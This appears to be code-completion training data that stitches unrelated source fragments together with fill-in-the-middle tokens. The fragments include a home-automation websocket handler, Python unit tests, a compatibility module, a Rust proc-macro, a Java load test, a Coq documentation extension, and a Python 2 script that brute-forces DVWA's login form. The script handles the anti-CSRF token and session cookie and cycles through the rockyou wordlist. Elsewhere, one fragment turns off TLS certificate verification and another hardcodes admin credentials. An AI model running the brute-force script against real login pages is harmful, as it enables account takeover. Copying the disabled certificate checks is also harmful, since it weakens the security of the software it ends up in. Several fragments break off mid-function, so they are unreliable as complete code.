self.isy.Vars.SetValByAttr((vartype, varid), varval, modifier=True)
except KeyError:
logsupport.Logs.Log(
"Unknown variable from " + self.hubname + " - probably added since startup",
severity=ConsoleWarning)
elif prcode == 'Heartbeat':
if self.hbcount > 0:
# wait 2 heartbeats
self.THstate = 'running'
self.lastheartbeat = time.time()
self.hbcount += 1
elif prcode == 'Billing':
self.THstate = 'running'
else:
pass # handle any other?
efmtact = E.pop('fmtAct', 'v4stream')
efmtnm = E.pop('fmtName', 'noName')
if E:
lev = ConsoleDetailHigh if str(
enode) in self.isy.V3Nodes else ConsoleWarning # supress to detail if it is a V3 node
logsupport.Logs.Log(
self.hubname + " Extra info in event: " + str(ecode) + '/' + str(prcode) + '/' + str(
eaction) + '/' + str(enode) + '/' + str(eInfo) + ' ' + str(E), severity=lev)
debug.debugPrint('DaemonStream', time.time() - config.sysStore.ConsoleStartTime,
formatwsitem(esid, eseq, ecode, eaction, enode, eInfo, E, self.isy))
try:
isynd = self.isy.NodesByAddr[enode].name
except (KeyError, AttributeError):
isynd = enode
if ecode == '_5':
now = time.time()
if str(eaction) == '1':
# logsupport.Logs.Log(self.hubname, ' went busy')
self.isy.Busy = now
elif str(eaction) == '0':
if self.isy.Busy != 0:
# logsupport.Logs.Log(self.hubname, " cleared busy")
if now - self.isy.Busy > 10:
logsupport.Logs.Log(
"{}: busy for {:.4f} seconds".format(self.hubname, now - self.isy.Busy))
self.isy.Busy = 0
else:
logsupport.Logs.Log(self.hubname, " reported stand-alone not busy")
else:
logsupport.Logs.Log(self.hubname, " reported System Status: ", str(eaction))
if ecode == "ST" or (ecode == "_3" and eaction == "CE"):
if self.LastMsgErr[0] != '***' and (
BaseAddr(self.LastMsgErr[0]) == BaseAddr(enode)):
# ERR msg followed by clearing - ISY weirdness?
logsupport.Logs.Log(
"{} reported and immediately cleared error for node: {} ({}) (seq:{}/{})".format(
self.hubname,
isynd, BaseAddr(self.LastMsgErr[0]), self.LastMsgErr[1], eseq),
severity=ConsoleWarning, hb=True)
self.LastMsgErr = ('***', -99)
elif enode in self.isy.ErrNodes:
logsupport.Logs.Log("{} cleared comm error for node: {}".format(self.hubname, isynd))
if enode in self.isy.ErrNodes:
# logsupport.Logs.Log("Query thread still running")
del self.isy.ErrNodes[enode]
if self.LastMsgErr != ('***', -99):
# previous message was ERR and wasn't immediately cleared
try:
isyerrnd = self.isy.NodesByAddr[self.LastMsgErr[0]].name
except (KeyError, AttributeError):
isyerrnd = self.LastMsgErr[0]
logsupport.Logs.Log(
"{} WS stream shows comm error for node: {}(Seq:{})".format(self.hubname, isyerrnd,
self.LastMsgErr[1]),
severity=ConsoleWarning, hb=True)
if self.LastMsgErr[0] not in self.isy.ErrNodes:
self.isy.ErrNodes[self.LastMsgErr[0]] = eseq
self.DoNodeQuery(self.LastMsgErr[0], isyerrnd)
self.LastMsgErr = ('***', -99)
if ecode == "ERR":
if str(eaction) == "0":
pass
# logsupport.Logs.Log("ERR(0) seen: {}".format(repr(m)))
else:
# Note the error and wait one message to see if it immediately clears
self.LastMsgErr = (enode, eseq)
logsupport.Logs.Log("ERR(1) seen: {}".format(repr(xmltodict.parse(message))),
severity=ConsoleWarning)
if ecode == "_3" and eaction == "NE":
self.LastMsgErr = (enode, eseq)
logsupport.Logs.Log(
"{} WS stream reported NE error code on WS stream for node{}(Seq:{})".format(self.hubname,
isynd, eseq),
hb=True)
else:
logsupport.Logs.Log(self.hubname + " Strange item in event stream: " + str(m),
severity=ConsoleWarning)
safeprint(message)
except Exception as E:
logsupport.Logs.Log(self.hubname + " Exception in QH on message: ", repr(msav), ' Excp: ', repr(E),
severity=ConsoleWarning)
loopend = time.time()
self.isy.HBWS.Entry('Processing time: {} Done: {}'.format(loopend - loopstart, repr(
message)))
time.sleep(.001) # force thread to give up processor to allow response to time events
if self.isy.version == -1:
self.isy._HubOnline = True
time.sleep(7)
with open('/home/pi/Console/isystream.dmp', 'r') as f:
mes = f.readline() # absorb first
# safeprint("Message1: {}".format(mes))
while True:
mes = f.readline().rstrip('\n')
if mes == '':
# safeprint('Done')
break
# safeprint("Message: {}".format(mes))
on_message(None, mes)
time.sleep(.4)
while True:
time.sleep(500)
return
self.THstate = 'delaying'
logsupport.Logs.Log("{}: WS stream thread {} setup".format(self.hubname, self.QHnum), severity=ConsoleDetail)
if self.delayedstart != 0:
logsupport.Logs.Log(self.hubname + " Delaying Hub restart for probable network reset: ",
str(self.delayedstart), ' seconds')
time.sleep(self.delayedstart)
# websocket.enableTrace(True)
websocket.setdefaulttimeout(30)
if self.isy.addr.startswith('http://'):
wsurl = 'ws://' + self.isy.addr[7:] + '/rest/subscribe'
elif self.isy.addr.startswith('https://'):
wsurl = 'wss://' + self.isy.addr[8:] + '/rest/subscribe'
else:
wsurl = 'ws://' + self.isy.addr + '/rest/subscribe'
import logging
WStrace = open('/home/pi/WStrace', 'w')
print('Open {}'.format(wsurl), file=WStrace)
websocket.enableTrace(True, handler=logging.StreamHandler(stream=WStrace))
while True:
try:
# noinspection PyArgumentList
if self.connectionmode in ('trypolisy', 'polisyworked'):
ws = websocket.WebSocketApp(wsurl, on_message=on_message,
on_error=on_error,
on_close=on_close, on_open=on_open,
header={'Authorization': 'Basic ' + self.a.decode('ascii')})
else:
ws = websocket.WebSocketApp(wsurl, on_message=on_message,
on_error=on_error,
subprotocols=['ISYSUB'],
on_close=on_close, on_open=on_open,
header={'Authorization': 'Basic ' + self.a.decode('ascii')})
break
except AttributeError as e:
logsupport.Logs.Log(self.hubname + " Problem starting WS handler - retrying: ", repr(e))
self.lastheartbeat = time.time()
ws.run_forever(ping_timeout=999, sslopt={"cert_reqs": ssl.CERT_NONE})
self.THstate = 'failed'
self.isy._HubOnline = False
sev = ConsoleWarning if config.sysStore.ErrLogReconnects else logsupport.ConsoleInfo
logsupport.Logs.Log(self.hubname + " QH Thread " + str(self.QHnum) + " exiting", severity=sev,
tb=False)<|fim▁end|> | |
<|file_name|>test_szig.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python2.7
############################################################################
##
## Copyright (c) 2000-2015 BalaBit IT Ltd, Budapest, Hungary
## Copyright (c) 2015-2018 BalaSys IT Ltd, Budapest, Hungary
##
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License along
## with this program; if not, write to the Free Software Foundation, Inc.,
## 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
##
############################################################################
import unittest
from HandlerMock import HandlerMock
from zorpctl.szig import SZIG
<|fim▁hole|>
class TestSzig(unittest.TestCase):
    """Unit tests for the SZIG protocol wrapper, backed by HandlerMock.

    Uses ``assertEqual`` (the ``assertEquals`` alias was deprecated and
    removed in Python 3.12).
    """

    def setUp(self):
        # Each test gets a fresh SZIG talking to the in-memory mock handler.
        self.szig = SZIG("", HandlerMock)

    def test_get_value(self):
        """Leaf nodes return their value; container nodes return None."""
        self.assertEqual(self.szig.get_value(""), None)
        self.assertEqual(self.szig.get_value("service"), None)
        self.assertEqual(self.szig.get_value("info.policy.file"), "/etc/zorp/policy.py")
        self.assertEqual(self.szig.get_value("stats.thread_number"), 5)
        self.assertEqual(self.szig.get_value("service.service_http_transparent.sessions_running"), 0)

    def test_get_sibling(self):
        """get_sibling returns the next node at the same level, or None."""
        self.assertEqual(self.szig.get_sibling("conns"), "info")
        self.assertEqual(self.szig.get_sibling("stats.threads_running"), "stats.thread_rate_max")
        self.assertEqual(self.szig.get_sibling("stats.thread_rate_max"), "stats.audit_number")
        self.assertEqual(self.szig.get_sibling("stats.thread_number"), None)

    def test_get_child(self):
        """get_child returns the first child of a node, or None for leaves."""
        self.assertEqual(self.szig.get_child(""), "conns")
        self.assertEqual(self.szig.get_child("info"), "info.policy")
        self.assertEqual(self.szig.get_child("info.policy"), "info.policy.reload_stamp")
        self.assertEqual(self.szig.get_child("info.policy.reload_stamp"), None)

    def test_get_set_loglevel(self):
        """The loglevel property round-trips."""
        loglevel = 6
        self.szig.loglevel = loglevel
        self.assertEqual(self.szig.loglevel, loglevel)

    def test_get_set_logspec(self):
        """The logspec property round-trips."""
        logspec = "this is a logspec"
        self.szig.logspec = logspec
        self.assertEqual(self.szig.logspec, logspec)

    def test_get_set_deadlockcheck(self):
        """The deadlockcheck property round-trips."""
        deadlockcheck = False
        self.szig.deadlockcheck = deadlockcheck
        self.assertEqual(self.szig.deadlockcheck, deadlockcheck)

    def test_reload_and_reload_result(self):
        """reload() succeeds and reload_result() reports success."""
        self.szig.reload()
        self.assertEqual(self.szig.reload_result(), True)

    def test_coredump(self):
        """coredump() must fail until the feature is repaired.

        The original bare ``try/except`` also swallowed the AssertionError
        raised when coredump() unexpectedly succeeded, so this test could
        never fail; failing outside the ``except`` fixes that.
        """
        try:
            self.szig.coredump()
        except Exception:
            return  # expected: coredump is not working yet
        self.fail("szig coredump should not work while not repaired")
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
<|file_name|>compat.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""
wakatime.compat
~~~~~~~~~~~~~~~
For working with Python2 and Python3.
:copyright: (c) 2014 Alan Hamlett.
:license: BSD, see LICENSE for more details.
"""
import codecs
import os
import platform
import subprocess
import sys
is_py2 = (sys.version_info[0] == 2)
is_py3 = (sys.version_info[0] == 3)
is_win = platform.system() == 'Windows'
if is_py2: # pragma: nocover
def u(text):
    """Coerce ``text`` to unicode (Python 2 branch), trying utf-8 first.

    Falls back to the interpreter's default encoding, then ``unicode()``,
    and finally utf-8 with replacement characters — never raising on
    undecodable input. Returns None unchanged.
    """
    if text is None:
        return None
    try:
        return text.decode('utf-8')
    except:
        try:
            return text.decode(sys.getdefaultencoding())
        except:
            try:
                return unicode(text)
            except:
                return text.decode('utf-8', 'replace')
open = codecs.open
basestring = basestring
elif is_py3: # pragma: nocover
def u(text):
if text is None:
return None
if isinstance(text, bytes):
try:
return text.decode('utf-8')
except:
try:
return text.decode(sys.getdefaultencoding())<|fim▁hole|> try:
return str(text)
except:
return text.decode('utf-8', 'replace')
open = open
basestring = (str, bytes)
try:
from importlib import import_module
except ImportError: # pragma: nocover
def _resolve_name(name, package, level):
    """Return the absolute name of the module to be imported.

    ``level`` is the number of leading dots in the relative import; each
    level above 1 strips one trailing component from ``package``.
    NOTE: uses ``xrange`` — this fallback only runs on old Python 2
    interpreters where ``importlib.import_module`` is unavailable.
    """
    if not hasattr(package, 'rindex'):
        raise ValueError("'package' not set to a string")
    dot = len(package)
    for x in xrange(level, 1, -1):
        try:
            dot = package.rindex('.', 0, dot)
        except ValueError:
            raise ValueError("attempted relative import beyond top-level "
                             "package")
    return "%s.%s" % (package[:dot], name)
def import_module(name, package=None):
    """Import a module.

    The 'package' argument is required when performing a relative import.
    It specifies the package to use as the anchor point from which to
    resolve the relative import to an absolute import.
    """
    if name.startswith('.'):
        if not package:
            raise TypeError("relative imports require the 'package' "
                            "argument")
        level = 0
        # Count leading dots to determine the relative-import level.
        for character in name:
            if character != '.':
                break
            level += 1
        name = _resolve_name(name[level:], package, level)
    __import__(name)
    # __import__ returns the top-level package; fetch the actual module.
    return sys.modules[name]
try:
from .packages import simplejson as json
except (ImportError, SyntaxError): # pragma: nocover
import json
class Popen(subprocess.Popen):
"""Patched Popen to prevent opening cmd window on Windows platform."""
def __init__(self, *args, **kwargs):
startupinfo = kwargs.get('startupinfo')
if is_win or True:
try:
startupinfo = startupinfo or subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
except AttributeError:
pass
kwargs['startupinfo'] = startupinfo
if 'env' not in kwargs:
kwargs['env'] = os.environ.copy()
kwargs['env']['LANG'] = 'en-US' if is_win else 'en_US.UTF-8'
subprocess.Popen.__init__(self, *args, **kwargs)<|fim▁end|> | except:
pass |
<|file_name|>dvwa-login-bruteforce-http-post-csrf.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
# Quick PoC template for HTTP POST form brute force, with anti-CRSF token
# Target: DVWA v1.10
# Date: 2015-10-19
# Author: g0tmi1k ~ https://blog.g0tmi1k.com/
# Source: https://blog.g0tmi1k.com/2015/10/dvwa-login/
import requests
import sys
import re
from BeautifulSoup import BeautifulSoup
# Variables
target = 'http://192.168.1.33/DVWA'
user_list = '/usr/share/seclists/Usernames/top_shortlist.txt'
pass_list = '/usr/share/seclists/Passwords/rockyou.txt'
# Value to look for in response header (Whitelisting)
success = 'index.php'
# Get the anti-CSRF token
def csrf_token():
try:
# Make the request to the URL
print "\n[i] URL: %s/login.php" % target
r = requests.get("{0}/login.php".format(target), allow_redirects=False)
except:
# Feedback for the user (there was an error) & Stop execution of our request
print "\n[!] csrf_token: Failed to connect (URL: %s/login.php).\n[i] Quitting." % (target)
sys.exit(-1)
# Extract anti-CSRF token
soup = BeautifulSoup(r.text)
user_token = soup("input", {"name": "user_token"})[0]["value"]
print "[i] user_token: %s" % user_token
<|fim▁hole|>
return session_id, user_token
# Make the request to-do the brute force
# NOTE: Python 2 script (uses print statements).
def url_request(username, password, session_id, user_token):
    # Submit one login attempt to DVWA and return the redirect target.
    # A redirect (301/302) is expected; its Location header distinguishes
    # success (index.php) from failure. Exits the script on any error.
    # POST data
    data = {
        "username": username,
        "password": password,
        "user_token": user_token,
        "Login": "Login"
    }
    # Cookie data
    cookie = {
        "PHPSESSID": session_id
    }
    try:
        # Make the request to the URL
        #print "\n[i] URL: %s/vulnerabilities/brute/" % target
        #print "[i] Data: %s" % data
        #print "[i] Cookie: %s" % cookie
        r = requests.post("{0}/login.php".format(target), data=data, cookies=cookie, allow_redirects=False)
    except:
        # Feedback for the user (there was an error) & Stop execution of our request
        print "\n\n[!] url_request: Failed to connect (URL: %s/vulnerabilities/brute/).\n[i] Quitting." % (target)
        sys.exit(-1)
    # Wasn't it a redirect?
    if r.status_code != 301 and r.status_code != 302:
        # Feedback for the user (there was an error again) & Stop execution of our request
        print "\n\n[!] url_request: Page didn't response correctly (Response: %s).\n[i] Quitting." % (r.status_code)
        sys.exit(-1)
    # We have what we need
    return r.headers["Location"]
# Main brute force loop
def brute_force(user_token, session_id):
    # Try every (password, username) pair from the wordlists; returns True
    # on the first combination whose redirect matches `success`, else False.
    # Note the loop order: for each password, every username is tried.
    # Load in wordlists files
    with open(pass_list) as password:
        password = password.readlines()
    with open(user_list) as username:
        username = username.readlines()
    # Counter
    i = 0
    # Loop around
    for PASS in password:
        for USER in username:
            USER = USER.rstrip('\n')
            PASS = PASS.rstrip('\n')
            # Increase counter
            i += 1
            # Feedback for the user
            print ("[i] Try %s: %s // %s" % (i, USER, PASS))
            # Fresh CSRF token each time?
            #user_token, session_id = csrf_token()
            # Make request
            attempt = url_request(USER, PASS, session_id, user_token)
            #print attempt
            # Check response
            if attempt == success:
                print ("\n\n[i] Found!")
                print "[i] Username: %s" % (USER)
                print "[i] Password: %s" % (PASS)
                return True
    return False
# Get initial CSRF token
session_id, user_token = csrf_token()
# Start brute forcing
brute_force(user_token, session_id)<|fim▁end|> | # Extract session information
session_id = re.match("PHPSESSID=(.*?);", r.headers["set-cookie"])
session_id = session_id.group(1)
print "[i] session_id: %s\n" % session_id |
<|file_name|>task_index.py<|end_file_name|><|fim▁begin|>from __future__ import absolute_import
from changes.api.base import APIView
from changes.models import Task
class TaskIndexAPIView(APIView):
def get(self):
queryset = Task.query.order_by(Task.date_created.desc())
<|fim▁hole|><|fim▁end|> | return self.paginate(queryset) |
<|file_name|>macro-brackets.rs<|end_file_name|><|fim▁begin|>// Copyright 2018 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// force-host
// no-prefer-dynamic<|fim▁hole|>#![crate_type = "proc-macro"]
extern crate proc_macro;
use proc_macro::*;
// Identity attribute macro: expands to the annotated item's tokens
// unchanged (round-tripped through TokenStream's iterator).
#[proc_macro_attribute]
pub fn doit(_: TokenStream, input: TokenStream) -> TokenStream {
    input.into_iter().collect()
}
<|file_name|>D0002FuncTest.java<|end_file_name|><|fim▁begin|>package top.cardone.func.vx.usercenter.userDepartment;
import com.google.common.base.Charsets;
import lombok.extern.log4j.Log4j2;
import lombok.val;
import org.apache.commons.io.FileUtils;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.boot.test.context.SpringBootTest;
import org.springframework.core.io.Resource;
import org.springframework.http.HttpEntity;
import org.springframework.http.HttpHeaders;
import org.springframework.http.MediaType;
import org.springframework.test.context.junit4.SpringJUnit4ClassRunner;
import org.springframework.util.StopWatch;
import top.cardone.ConsumerApplication;
import top.cardone.context.ApplicationContextHolder;
import java.io.IOException;
@Log4j2
@RunWith(SpringJUnit4ClassRunner.class)
@SpringBootTest(classes = ConsumerApplication.class, value = {"spring.profiles.active=test"}, webEnvironment = SpringBootTest.WebEnvironment.DEFINED_PORT)
public class D0002FuncTest {<|fim▁hole|> @Value("file:src/test/resources/top/cardone/func/vx/usercenter/userDepartment/D0002FuncTest.func.input.json")
private Resource funcInputResource;
@Value("file:src/test/resources/top/cardone/func/vx/usercenter/userDepartment/D0002FuncTest.func.output.json")
private Resource funcOutputResource;
private HttpEntity<String> httpEntity;
private int pressure = 10000;
@Before
public void setup() throws Exception {
    // Build the JSON request entity shared by all tests: auth headers plus
    // the recorded input payload (created as "{}" if the file is missing).
    HttpHeaders headers = new HttpHeaders();
    headers.setContentType(MediaType.APPLICATION_JSON_UTF8);
    headers.set("Accept", MediaType.APPLICATION_JSON_UTF8_VALUE);
    // "token" is the encrypted password the server checks against "username".
    headers.set("token", ApplicationContextHolder.getBean(org.apache.shiro.authc.credential.PasswordService.class).encryptPassword("admin"));
    headers.set("username", "admin");
    if (!funcInputResource.exists()) {
        FileUtils.write(funcInputResource.getFile(), "{}", Charsets.UTF_8);
    }
    String input = FileUtils.readFileToString(funcInputResource.getFile(), Charsets.UTF_8);
    httpEntity = new HttpEntity<>(input, headers);
}
@Test
public void func() throws RuntimeException {
    // Invoke the endpoint once and persist the raw response to the
    // output resource for manual inspection.
    String output = new org.springframework.boot.test.web.client.TestRestTemplate().postForObject(funcUrl, httpEntity, String.class);
    try {
        FileUtils.write(funcOutputResource.getFile(), output, Charsets.UTF_8);
    } catch (IOException e) {
        throw new RuntimeException(e);
    }
}
@Test
public void pressureFunc() throws Exception {
    // Crude load test: hit the endpoint `pressure` times, logging any
    // request slower than 500 ms at error level (debug otherwise).
    for (int i = 0; i < pressure; i++) {
        val sw = new StopWatch();
        sw.start(funcUrl);
        new org.springframework.boot.test.web.client.TestRestTemplate().postForObject(funcUrl, httpEntity, String.class);
        sw.stop();
        if (sw.getTotalTimeMillis() > 500) {
            log.error(sw.prettyPrint());
        } else if (log.isDebugEnabled()) {
            log.debug(sw.prettyPrint());
        }
        log.debug("pressured:" + (i + 1));
    }
}
}<|fim▁end|> | @Value("http://localhost:${server.port:8765}${server.servlet.context-path:}/vx/usercenter/userDepartment/d0002.json")
private String funcUrl;
|
<|file_name|>coqdomain.py<|end_file_name|><|fim▁begin|>##########################################################################
## # The Coq Proof Assistant / The Coq Development Team ##
## v # Copyright INRIA, CNRS and contributors ##
## <O___,, # (see version control and CREDITS file for authors & dates) ##
## \VV/ ###############################################################
## // # This file is distributed under the terms of the ##
## # GNU Lesser General Public License Version 2.1 ##
## # (see LICENSE file for the text of the license) ##
##########################################################################
"""A Coq domain for Sphinx.
Currently geared towards Coq's manual, rather than Coq source files, but one
could imagine extending it.
"""
# pylint: disable=missing-type-doc, missing-param-doc
# pylint: disable=missing-return-type-doc, missing-return-doc
# pylint: disable=too-few-public-methods, too-many-ancestors, arguments-differ
# pylint: disable=import-outside-toplevel, abstract-method, too-many-lines
import os
import re
from itertools import chain
from collections import defaultdict
from docutils import nodes, utils
from docutils.transforms import Transform
from docutils.parsers.rst import Directive, directives
from docutils.parsers.rst.roles import code_role #, set_classes
from docutils.parsers.rst.directives.admonitions import BaseAdmonition
from sphinx import addnodes
from sphinx.directives import ObjectDescription
from sphinx.domains import Domain, ObjType, Index
from sphinx.errors import ExtensionError
from sphinx.roles import XRefRole
from sphinx.util.docutils import ReferenceRole
from sphinx.util.logging import getLogger, get_node_location
from sphinx.util.nodes import set_source_info, set_role_source_info, make_refnode
from sphinx.writers.latex import LaTeXTranslator
from . import coqdoc
from .repl import ansicolors
from .repl.coqtop import CoqTop, CoqTopError
from .notations.parsing import ParseError
from .notations.sphinx import sphinxify
from .notations.plain import stringify_with_ellipses
# FIXME: Patch this in Sphinx
# https://github.com/coq/coq/issues/12361
def visit_desc_signature(self, node):
    """LaTeX visitor override: emit a hypertarget per signature id.

    Skips plain `describe` objects, then renders the signature either as
    a single line or as the start of a multiline signature group.
    """
    hyper = ''
    if node.parent['objtype'] != 'describe' and node['ids']:
        for id in node['ids']:
            hyper += self.hypertarget(id)
    self.body.append(hyper)
    if not node.get('is_multiline'):
        self._visit_signature_line(node)
    else:
        self.body.append('%\n\\pysigstartmultiline\n')

# Monkey-patch the translator so all builds use the fixed version.
LaTeXTranslator.visit_desc_signature = visit_desc_signature
# Error template for notation parse failures:
# (file, line, offending notation, parser message).
PARSE_ERROR = """{}:{} Parse error in notation!
Offending notation: {}
Error message: {}"""

def notation_to_sphinx(notation, source, line, rawtext=None):
    """Parse notation and wrap it in an inline node.

    :param notation: notation string in Coq's notation mini-language.
    :param source: source file name, attached to the node and used in errors.
    :param line: source line number, likewise.
    :param rawtext: optional raw text for the node (defaults to ``notation``).
    :raises ExtensionError: if the notation fails to parse.
    """
    try:
        node = nodes.inline(rawtext or notation, '', *sphinxify(notation), classes=['notation'])
        node.source, node.line = source, line
        return node
    except ParseError as e:
        raise ExtensionError(PARSE_ERROR.format(os.path.basename(source), line, notation, e.msg)) from e
def notation_to_string(notation):
    """Parse notation and format it as a string with ellipses.

    :raises ExtensionError: if the notation fails to parse.
    """
    try:
        return stringify_with_ellipses(notation)
    except ParseError as e:
        # No source position is available in this helper.  The previous
        # code referenced undefined `source`/`line` names here (see the
        # old FIXME, cc93f419e0), so the error path raised NameError
        # instead of the intended ExtensionError; report placeholders.
        raise ExtensionError(PARSE_ERROR.format("<unknown>", "?", notation, e.msg)) from e
def highlight_using_coqdoc(sentence):
    """Lex ``sentence`` with coqdoc and yield one inline node per token."""
    unescaped = utils.unescape(sentence, 1)
    for token_classes, token_value in coqdoc.lex(unescaped):
        yield nodes.inline(token_value, token_value, classes=token_classes)
def make_target(objtype, targetid):
    """Create a target to an object of type objtype and id targetid."""
    return "coq:%s.%s" % (objtype, targetid)
def make_math_node(latex, docname, nowrap):
    """Wrap ``latex`` in a docutils math_block node for ``docname``."""
    node = nodes.math_block(latex, latex)
    # label/number are cleared so the equation is not numbered.
    attributes = {'label': None, 'nowrap': nowrap, 'docname': docname, 'number': None}
    for attr_name, attr_value in attributes.items():
        node[attr_name] = attr_value
    return node
class CoqObject(ObjectDescription):
"""A generic Coq object for Sphinx; all Coq objects are subclasses of this.
The fields and methods to override are listed at the top of this class'
implementation. Each object supports the :name: option, which gives an
explicit name to link to.
See the comments and docstrings in CoqObject for more information.
"""
# The semantic domain in which this object lives (eg. “tac”, “cmd”, “chm”…).
# It matches exactly one of the roles used for cross-referencing.
subdomain = None # type: str
# The suffix to use in indices for objects of this type (eg. “(tac)”)
index_suffix = None # type: str
# The annotation to add to headers of objects of this type
# (eg. “Command”, “Theorem”)
annotation = None # type: str
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._sig_names = None
def _name_from_signature(self, signature): # pylint: disable=no-self-use, unused-argument
"""Convert a signature into a name to link to.
‘Signature’ is Sphinx parlance for an object's header (think “type
signature”); for example, the signature of the simplest form of the
``exact`` tactic is ``exact @id``.
Generates a name for the directive. Override this method to return None
to avoid generating a name automatically. This is a convenient way
to automatically generate names (link targets) without having to write
explicit names everywhere.
"""
m = re.match(r"[a-zA-Z0-9_ ]+", signature)
if m:
return m.group(0).strip()
def _render_signature(self, signature, signode):
"""Render a signature, placing resulting nodes into signode."""
raise NotImplementedError(self)
option_spec = {
# Explicit object naming
'name': directives.unchanged,
# Silence warnings produced by report_undocumented_coq_objects
'undocumented': directives.flag,
# noindex omits this object from its index
'noindex': directives.flag
}
def subdomain_data(self):
if self.subdomain is None:
raise ValueError()
return self.env.domaindata['coq']['objects'][self.subdomain]
def _render_annotation(self, signode):
if self.annotation:
annot_node = nodes.inline(self.annotation, self.annotation, classes=['sigannot'])
signode += addnodes.desc_annotation(self.annotation, '', annot_node)
signode += nodes.Text(' ')
def handle_signature(self, signature, signode):
"""Prefix signature with the proper annotation, then render it using
``_render_signature`` (for example, add “Command” in front of commands).
:returns: the names given to the resulting node.
"""
self._render_annotation(signode)
self._render_signature(signature, signode)
names = self._sig_names.get(signature)
if names is None:
name = self._name_from_signature(signature) # pylint: disable=assignment-from-none
# remove trailing ‘.’ found in commands, but not ‘...’ (ellipsis)
if name is not None and name.endswith(".") and not name.endswith("..."):
name = name[:-1]
names = [name] if name else None
return names
def _warn_if_duplicate_name(self, objects, name, signode):
"""Check that two objects in the same domain don't have the same name."""
if name in objects:
MSG = 'Duplicate name {} (other is in {}) attached to {}'
msg = MSG.format(name, self.env.doc2path(objects[name][0]), signode)
self.state_machine.reporter.warning(msg, line=self.lineno)
def _record_name(self, name, target_id, signode):
"""Record a `name` in the current subdomain, mapping it to `target_id`.
Warns if another object of the same name already exists; `signode` is
used in the warning.
"""
names_in_subdomain = self.subdomain_data()
self._warn_if_duplicate_name(names_in_subdomain, name, signode)
names_in_subdomain[name] = (self.env.docname, self.objtype, target_id)
def _target_id(self, name):
return make_target(self.objtype, nodes.make_id(name))
def _add_target(self, signode, name):
"""Register a link target ‘name’, pointing to signode."""
targetid = self._target_id(name)
if targetid not in self.state.document.ids:
signode['ids'].append(targetid)
signode['names'].append(name)
signode['first'] = (not self.names)
self._record_name(name, targetid, signode)
return targetid
def _add_index_entry(self, name, target):
"""Add `name` (pointing to `target`) to the main index."""
assert isinstance(name, str)
# remove trailing . , found in commands, but not ... (ellipsis)
trim = name.endswith(".") and not name.endswith("...")
index_text = name[:-1] if trim else name
if self.index_suffix:
index_text += " " + self.index_suffix
self.indexnode['entries'].append(('single', index_text, target, '', None))
def add_target_and_index(self, names, _, signode):
"""Attach a link target to `signode` and index entries for `names`.
This is only called (from ``ObjectDescription.run``) if ``:noindex:`` isn't specified."""
if names:
for name in names:
if isinstance(name, str) and name.startswith('_'):
continue
target = self._add_target(signode, name)
self._add_index_entry(name, target)
self.state.document.note_explicit_target(signode)
def _prepare_names(self):
"""Construct ``self._sig_names``, a map from signatures to names.
A node may have either one signature with no name, multiple signatures
with one name per signatures, or one signature with multiple names.
"""
sigs = self.get_signatures()
names = self.options.get("name")
if names is None:
self._sig_names = {}
else:
names = [n.strip() for n in names.split(";")]
if len(names) != len(sigs):
if len(sigs) != 1: #Multiple names for one signature
ERR = ("Expected {} semicolon-separated names, got {}. " +
"Please provide one name per signature line.")
raise self.error(ERR.format(len(names), len(sigs)))
self._sig_names = { sigs[0]: names }
else:
self._sig_names = { sig: [name] for (sig, name) in zip(sigs, names) }
    def run(self):
        # Compute the signature→names map before ObjectDescription.run fires
        # handle_signature/add_target_and_index, which consume _sig_names.
        self._prepare_names()
        return super().run()
class DocumentableObject(CoqObject):
    """A ``CoqObject`` that can warn when its directive has no body.

    The check is opt-in through the ``report_undocumented_coq_objects``
    config value ("info" or "warning"); an ``:undocumented:`` flag on a
    specific directive silences it there.
    """

    def _warn_if_undocumented(self):
        document = self.state.document
        settings = document.settings
        report = settings.env.config.report_undocumented_coq_objects
        silenced = "undocumented" in self.options
        if not report or self.content or silenced:
            return
        # This is annoyingly convoluted, but we don't want to raise warnings
        # or interrupt the generation of the current node. For more details
        # see https://github.com/sphinx-doc/sphinx/issues/4976.
        msg = 'No contents in directive {}'.format(self.name)
        node = document.reporter.info(msg, line=self.lineno)
        getLogger(__name__).info(node.astext())
        if report == "warning":
            raise self.warning(msg)

    def run(self):
        self._warn_if_undocumented()
        return super().run()
class PlainObject(DocumentableObject):
    """Base class for objects whose signatures are rendered verbatim."""
    def _render_signature(self, signature, signode):
        # No notation parsing: the raw signature text is the displayed name.
        name_node = addnodes.desc_name(signature, signature)
        signode += name_node
class NotationObject(DocumentableObject):
    """Base class for objects whose signatures render as nested boxes.

    Subclasses may use the notation grammar ("{+ ...}", "@...", etc.) in
    their signatures.
    """
    def _render_signature(self, signature, signode):
        source, line = self.state_machine.get_source_and_line(self.lineno)
        parsed = notation_to_sphinx(signature, source, line)
        signode += addnodes.desc_name(signature, '', parsed)
class GallinaObject(PlainObject):
    r"""A theorem.
    Example::
       .. thm:: Bound on the ceiling function
          Let :math:`p` be an integer and :math:`c` a rational constant. Then
          :math:`p \ge c \rightarrow p \ge \lceil{c}\rceil`.
    """
    subdomain = "thm"           # registered under the "thm" subdomain
    index_suffix = "(theorem)"  # suffix shown after the name in the index
    annotation = "Theorem"      # prefix rendered before the signature
class VernacObject(NotationObject):
    """A Coq command.
    Example::
       .. cmd:: Infix @string := @one_term {? ( {+, @syntax_modifier } ) } {? : @ident }
          This command is equivalent to :n:`…`.
    """
    subdomain = "cmd"
